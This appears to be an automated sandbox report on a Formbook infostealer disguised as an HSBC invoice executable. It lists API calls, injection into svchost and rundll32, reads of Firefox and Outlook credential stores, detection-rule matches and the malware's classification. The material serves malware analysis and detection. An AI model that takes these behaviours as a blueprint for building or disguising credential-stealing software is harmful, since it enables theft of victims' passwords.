            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F0CDAC
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0CD6C GetWindowLongW,NtdllDialogWndProc_W,0_2_00F0CD6C
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E81287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745CC8D0,NtdllDialogWndProc_W,0_2_00E81287
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E81290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00E81290
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E816DE GetParent,NtdllDialogWndProc_W,0_2_00E816DE
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0D6C6 NtdllDialogWndProc_W,0_2_00F0D6C6
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E816B5 NtdllDialogWndProc_W,0_2_00E816B5
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E8167D NtdllDialogWndProc_W,0_2_00E8167D
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0D74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_00F0D74C
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E8189B NtdllDialogWndProc_W,0_2_00E8189B
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0DA9A NtdllDialogWndProc_W,0_2_00F0DA9A
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0BF4D NtdllDialogWndProc_W,CallWindowProcW,0_2_00F0BF4D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B873 NtClose,2_2_0042B873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72B60 NtClose,LdrInitializeThunk,2_2_03D72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03D72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D735C0 NtCreateMutant,LdrInitializeThunk,2_2_03D735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D74340 NtSetContextThread,2_2_03D74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D74650 NtSuspendThread,2_2_03D74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72BF0 NtAllocateVirtualMemory,2_2_03D72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72BE0 NtQueryValueKey,2_2_03D72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72B80 NtQueryInformationFile,2_2_03D72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72BA0 NtEnumerateValueKey,2_2_03D72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72AD0 NtReadFile,2_2_03D72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72AF0 NtWriteFile,2_2_03D72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72AB0 NtWaitForSingleObject,2_2_03D72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72FE0 NtCreateFile,2_2_03D72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72F90 NtProtectVirtualMemory,2_2_03D72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72FB0 NtResumeThread,2_2_03D72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72FA0 NtQuerySection,2_2_03D72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72F60 NtCreateProcessEx,2_2_03D72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72F30 NtCreateSection,2_2_03D72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72EE0 NtQueueApcThread,2_2_03D72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72E80 NtReadVirtualMemory,2_2_03D72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72EA0 NtAdjustPrivilegesToken,2_2_03D72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72E30 NtWriteVirtualMemory,2_2_03D72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72DD0 NtDelayExecution,2_2_03D72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72DB0 NtEnumerateKey,2_2_03D72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72D10 NtMapViewOfSection,2_2_03D72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72D00 NtSetInformationFile,2_2_03D72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72D30 NtUnmapViewOfSection,2_2_03D72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72CC0 NtQueryVirtualMemory,2_2_03D72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72CF0 NtOpenProcess,2_2_03D72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72CA0 NtQueryInformationToken,2_2_03D72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72C70 NtFreeVirtualMemory,2_2_03D72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72C60 NtCreateKey,2_2_03D72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72C00 NtQueryInformationProcess,2_2_03D72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D73090 NtSetValueKey,2_2_03D73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D73010 NtOpenDirectoryObject,2_2_03D73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D739B0 NtGetContextThread,2_2_03D739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D73D70 NtOpenThread,2_2_03D73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D73D10 NtOpenProcessToken,2_2_03D73D10
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04904650 NtSuspendThread,LdrInitializeThunk,11_2_04904650
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04904340 NtSetContextThread,LdrInitializeThunk,11_2_04904340
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_04902CA0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_04902C70
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902C60 NtCreateKey,LdrInitializeThunk,11_2_04902C60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902DD0 NtDelayExecution,LdrInitializeThunk,11_2_04902DD0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_04902DF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902D10 NtMapViewOfSection,LdrInitializeThunk,11_2_04902D10
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_04902D30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_04902E80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902EE0 NtQueueApcThread,LdrInitializeThunk,11_2_04902EE0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902FB0 NtResumeThread,LdrInitializeThunk,11_2_04902FB0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902FE0 NtCreateFile,LdrInitializeThunk,11_2_04902FE0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902F30 NtCreateSection,LdrInitializeThunk,11_2_04902F30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902AD0 NtReadFile,LdrInitializeThunk,11_2_04902AD0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902AF0 NtWriteFile,LdrInitializeThunk,11_2_04902AF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_04902BA0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_04902BF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902BE0 NtQueryValueKey,LdrInitializeThunk,11_2_04902BE0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902B60 NtClose,LdrInitializeThunk,11_2_04902B60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_049035C0 NtCreateMutant,LdrInitializeThunk,11_2_049035C0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_049039B0 NtGetContextThread,LdrInitializeThunk,11_2_049039B0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902CC0 NtQueryVirtualMemory,11_2_04902CC0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902CF0 NtOpenProcess,11_2_04902CF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902C00 NtQueryInformationProcess,11_2_04902C00
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902DB0 NtEnumerateKey,11_2_04902DB0
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_04902D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_04902EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_04902E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_04902F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_04902FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_04902F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_04902AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_04902B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_04903090 NtSetValueKey
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_04903010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_04903D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_04903D70 NtOpenThread
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_027D8270 NtDeleteFile
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_027D8310 NtClose
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_027D8030 NtCreateFile
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_027D8190 NtReadFile
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_027D8470 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe; Code function: 0_2_00EE40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe; Code function: 0_2_00ED8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,746E5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe; Code function: 0_2_00EE545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: String function: 03D87E54 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: String function: 03D75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: String function: 03DAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: String function: 03DBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: String function: 03D2B970 appears 280 times
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: String function: 048BB970 appears 279 times
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: String function: 04917E54 appears 111 times
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: String function: 0494F290 appears 105 times
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: String function: 04905130 appears 50 times
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: String function: 0493EA12 appears 86 times
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe; Code function: String function: 00EA0D27 appears 70 times
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe; Code function: String function: 00EA8B40 appears 42 times
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe; Code function: String function: 00E87F41 appears 35 times
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1262426724.0000000003963000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs HSBCscancopy-invoice778483-payment87476MT103.exe
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1260896685.0000000003B0D000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs HSBCscancopy-invoice778483-payment87476MT103.exe
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3725622704.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3725563654.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1520805638.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3725564617.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1521716208.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@19/11
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EEA2D5 GetLastError,FormatMessageW, | 0_2_00EEA2D5
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00ED8713 AdjustTokenPrivileges,CloseHandle, | 0_2_00ED8713
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00ED8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, | 0_2_00ED8CC3
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EEB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, | 0_2_00EEB59E
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EFF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, | 0_2_00EFF121
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00E84FE9 FindResourceExW,LoadResource,SizeofResource,LockResource, | 0_2_00E84FE9
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | File created: C:\Users\user\AppData\Local\Temp\autDF3B.tmp
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1701657790.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1701657790.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002ACB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe | ReversingLabs: Detection: 36%
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe | Virustotal: Detection: 37%
            Source: unknown | Process created: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Section loaded: ntmarta.dll
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Section loaded: apphelp.dll
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3713104067.000000000051E000.00000002.00000001.01000000.00000005.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000000.1591634837.000000000051E000.00000002.00000001.01000000.00000005.sdmp
